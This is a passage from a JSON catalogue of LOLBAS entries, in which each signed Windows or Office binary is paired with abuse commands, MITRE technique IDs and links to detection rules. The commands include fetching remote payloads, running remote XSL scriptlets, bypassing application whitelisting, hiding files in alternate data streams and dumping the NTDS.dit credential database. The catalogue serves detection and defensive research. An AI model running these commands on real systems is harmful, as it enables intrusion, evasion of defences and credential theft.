Download"],"nativeCategory":["Download"],"command":"MsoHtmEd.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml"},{"type":"IOC","value":"Suspicious Office application internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/"]},{"id":"lolbas:mspub-exe:0","toolId":"lolbas:mspub-exe","toolName":"Mspub.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"mspub.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml"},{"type":"IOC","value":"Suspicious Office application internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/"]},{"id":"lolbas:msxsl-exe:0","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msxsl.exe {PATH:.xml} {PATH:.xsl}","description":"Run COM Scriptlet code within the script.xsl file (local).","usecase":"Local execution of script stored in XSL file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:msxsl-exe:1","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msxsl.exe {PATH:.xml} {PATH:.xsl}","description":"Run COM Scriptlet code within the script.xsl file (local).","usecase":"Local execution of script stored in XSL file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:msxsl-exe:2","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl}","description":"Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).","usecase":"Local execution of remote script stored in XSL script stored as an XML file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:msxsl-exe:3","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml}","description":"Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).","usecase":"Local execution of remote script stored in XSL script stored as an XML file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:msxsl-exe:4","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}","description":"Using remote XML and XSL files, save the transformed XML file to disk.","usecase":"Download a file from the internet and save it to disk.","mitre":["T1105"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:msxsl-exe:5","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name","description":"Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).","usecase":"Download a file from the internet and save it to an NTFS Alternate Data Stream.","mitre":["T1564"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:nmcap-exe:0","toolId":"lolbas:nmcap-exe","toolName":"Nmcap.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"nmcap.exe /network * /capture /file {PATH_ABSOLUTE:.cap}","description":"Start capture on all network adapters and save to specified .cap (circular) file.\nOptionally, one can add:\n- `/TerminateWhen /TimeAfter 30 seconds` to auto-terminate after a relative times (e.g. 30 seconds);\n- `/TerminateWhen /Time 04:52:00 AM 9/17/2025` to auto-terminate after a specific date/time;\n- `/TerminateWhen /KeyPress x` to terminate when a specific key is pressed.\n","usecase":"Capture network traffic on windows to collect sensitive data.","mitre":["T1040"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft Network Monitor 3\\nmcap.exe","C:\\Program Files (x86)\\Microsoft Network Monitor 3\\nmcap.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/network-monitor-3","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Nmcap/"]},{"id":"lolbas:ntdsutil-exe:0","toolId":"lolbas:ntdsutil-exe","toolName":"ntdsutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"ntdsutil.exe \"ac i ntds\" \"ifm\" \"create full c:\\\" q q","description":"Dump NTDS.dit into folder","usecase":"Dumping of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\ntdsutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/ntdsutil_export_ntds.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"ntdsutil.exe with command line including \"ifm\""}],"references":["https://adsecurity.org/?p=2398#CreateIFM","https://lolbas-project.github.io/lolbas/OtherMSBinaries/ntdsutil/"]},{"id":"lolbas:ntsd-exe:0","toolId":"lolbas:ntsd-exe","toolName":"Ntsd.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ntsd.exe -g {CMD}","description":"Launches command through the debugging process; optionally add `-G` to exit the debugger automatically.","usecase":"Executes an executable under a trusted microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\ntsd.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://strontic.github.io/xcyclopedia/library/ntsd.exe-629EA12D527237B9CD945AC44C2DE80D.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntsd/"]},{"id":"lolbas:openconsole-exe:0","toolId":"lolbas:openconsole-exe","toolName":"OpenConsole.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"OpenConsole.exe {PATH:.exe}","description":"Execute specified process with OpenConsole.exe as parent process","usecase":"Use OpenConsole.exe as a proxy binary to evade defensive counter-measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os86\\OpenConsole.exe","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.18.10301.0_x64__8wekyb3d8bbwe\\OpenConsole.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"OpenConsole.exe spawning unexpected processes"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml"}],"references":["https://twitter.com/nas_bench/status/1537563834478645252","https://lolbas-project.github.io/lolbas/OtherMSBinaries/OpenConsole/"]},{"id":"lolbas:outlook-exe:0","toolId":"lolbas:outlook-exe","toolName":"Outlook.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Outlook.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Outlook/"]},{"id":"lolbas:pixtool-exe:0","toolId":"lolbas:pixtool-exe","toolName":"Pixtool.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pixtool.exe launch {PATH_ABSOLUTE:.exe}","description":"Launches an executable via PIX command-line utility.","usecase":"Executes an executable under a trusted, Microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft PIX\\pixtool.exe","C:\\Program Files (x86)\\Microsoft PIX\\pixtool.exe"],"toolType":"OtherMSBinary","references":["https://devblogs.microsoft.com/pix/pixtool/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Pixtool/"]},{"id":"lolbas:powerpnt-exe:0","toolId":"lolbas:powerpnt-exe","toolName":"Powerpnt.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Powerpnt.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/"]},{"id":"lolbas:procdump-exe:0","toolId":"lolbas:procdump-exe","toolName":"Procdump.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"procdump.exe -md {PATH:.dll} explorer.exe","description":"Loads the specified DLL where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.","usecase":"Performs execution of unsigned DLL.","mitre":["T1202"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Process creation with given '-md' parameter"},{"type":"IOC","value":"Anomalous child processes of procdump"},{"type":"IOC","value":"Unsigned DLL load via procdump.exe or procdump64.exe"}],"references":["https://twitter.com/ajpc500/status/1448588362382778372?s=20","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/"]},{"id":"lolbas:procdump-exe:1","toolId":"lolbas:procdump-exe","toolName":"Procdump.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"procdump.exe -md {PATH:.dll} foobar","description":"Loads the specified DLL where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.","usecase":"Performs execution of unsigned DLL.","mitre":["T1202"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Process creation with given '-md' parameter"},{"type":"IOC","value":"Anomalous child processes of procdump"},{"type":"IOC","value":"Unsigned DLL load via procdump.exe or procdump64.exe"}],"references":["https://twitter.com/ajpc500/status/1448588362382778372?s=20","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/"]},{"id":"lolbas:protocolhandler-exe:0","toolId":"lolbas:protocolhandler-exe","toolName":"ProtocolHandler.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ProtocolHandler.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office15\\ProtocolHandler.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/"]},{"id":"lolbas:rcsi-exe:0","toolId":"lolbas:rcsi-exe","toolName":"rcsi.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rcsi.exe {PATH:.csx}","description":"Use embedded C# within the csx script to execute the code.","usecase":"Local execution of arbitrary C# code stored in local CSX file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"}],"references":["https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/rcsi/"]},{"id":"lolbas:rcsi-exe:1","toolId":"lolbas:rcsi-exe","toolName":"rcsi.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rcsi.exe {PATH:.csx}","description":"Use embedded C# within the csx script to execute the code.","usecase":"Local execution of arbitrary C# code stored in local CSX file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"}],"references":["https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/rcsi/"]},{"id":"lolbas:remote-exe:0","toolId":"lolbas:remote-exe","toolName":"Remote.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Remote.exe /s {PATH:.exe} anythinghere","description":"Spawns specified executable as a child process of remote.exe","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"remote.exe process 